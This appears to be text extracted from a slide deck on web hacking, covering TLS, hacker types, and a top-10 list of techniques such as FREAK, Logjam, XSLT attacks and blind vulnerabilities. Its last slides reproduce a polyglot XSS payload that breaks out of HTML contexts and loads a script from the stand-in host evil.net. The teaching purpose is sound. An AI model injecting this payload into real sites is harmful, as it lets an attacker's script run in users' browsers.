  • 21. TLS ➢ “Transport Layer Security” ➢ Like SSL it is cryptographic protocol ➢ The successor to SSL (TLS 1.0 is actually SSL 3.1 but was renamed to mark the change to an open standard rather than Netscape's protocol) ➢ Currently has 3 versions 1.0, 1.1, 1.2 (1.3 in Draft) ➢ Like SSL it is a constantly changing protocol
  • 23. Whose are Hackers? A “Hacker” is a skilled programmer who is expertise in machine code and operating systems.
  • 24. Hackers are categorized into three main types • White Hat Hackers • Gray Hat Hackers • Black Hat Hackers
  • 25. Top 10 web hacking techniques 1. FREAK (Factoring Attack on RSA-Export Keys) 2. LogJam 3. Web Timing Attacks Made Practical 4. Evading All* WAF XSS Filters 5. Abusing CDN’s with SSRF Flash and DNS 6. IllusoryTLS 7. Exploiting XXE in File Parsing Functionality 8. Abusing XLST for Practical Attacks 9. Magic Hashes 10. Hunting Asynchronous Vulnerabilities
  • 26.
  • 27. FREAK (Factoring Attack on RSA-Export Keys) FREAK is a weakness in some implementations of SSL/TLS that may allow an attacker to decrypt secure communications between vulnerable clients and servers.
  • 29. FREAK Attack (Man in the Middle)
  • 30. FREAK Attack (Man in the Middle)
  • 31.
  • 32. Logjam is a security vulnerability against a Diffie–Hellman key exchange ranging from 512-it (US export-grade) to 1024-bit keys.
  • 33.
  • 34. Web Timing Attacks Made Practical1. A Web Timing Attack is a side channel attack in which the hacker attempts to settle a cryptosystem by analyzing the time taken to execute cryptographic algorithms. 2. Every logical operation takes some time to get executed, which can differ based on the input. With precise measurements of the time for each operation, an attacker can work backward to the input.
  • 36. Old Hacking Technique • SQL Injection • Js Injection • Session Hijack • DDoS Penetration
  • 38.
  • 42. Nothing is hackproof but we can make it difficult
  • 44. Abusing XSLT for Practical Attacks Security researcher Fernando Arnaboldi illustrated the different reasons of XSLT Attacks at the Black Hat conference for the first time. The vulnerability in XSLT was known for a long time. XSLT converts XML documents into other XML documents, or other formats such as HTML for web pages, plain text or XSL. It may lead to security issues like Denial of Service Attacks, Cross-Site Attacks etc. It can lead to threatening the integrity and confidentiality of user information.
  • 45. Hunting Asynchronous Vulnerability There are a number of asynchronous vulnerabilities which are not visible to a vulnerable client like error messages, async calls etc. Many asynchronous vulnerabilities are invisible. That is, there's no way to: • Trigger error messages • Cause differences in application output • Cause detectable time delays
  • 46. Hunting Asynchronous Vulnerability Invisible vulnerabilities can be roughly grouped into three types: • Server-side vulnerabilities in processing that occurs in a background thread, such as a shell command injection in a nightly cronjob or SQLi in a queued transaction. Here, a crafted payload might trigger a time delay, but the delay would only affect a background thread so it wouldn't be detectable. • Blind vulnerabilities that are triggered by a secondary event, such as blind XSS and some second order SQLi. Detection of these issues using normal techniques is possible but often tricky and error-prone. • Vulnerabilities where there is no way to cause a difference in application output, and the technology doesn't support anything that can be used to cause a reliable time delay. For example, blind XXE or XPath injection.
  • 47. Evading All* WAF XSS Filters As with shell command injection, it's easy to use XSS to trigger a pingback, but we don't know what the syntax surrounding our input will be - we might be landing inside a quoted attribute, or a <script> block, etc. We also don't know which characters may be filtered or encoded. Gareth Heyes crafted a superb payload to work in most common contexts. First it breaks out of script context and opens an SVG event handler: </script><svg/onload= Then it breaks out of single-quoted attribute, double-quoted attribute, and single/double quoted JavaScript literal contexts: '+/"/+/onmouseover=1/
  • 48. Evading All* WAF XSS Filters After this point everything is executed as JavaScript, so it's just a matter of importing an external JavaScript file, and grabbing a stack trace to help track down the issue afterwards: +(s=document.createElement(/script/.source), s.stack=Error().stack, s.src=(/,/+/evil.net/).slice(2), document.documentElement.appendChild(s))//’> Burp Suite will be using this payload as part of its active scanner within the next few months. If you're impatient, check out the Sleepy Puppy blind XSS framework recently released by Netflix.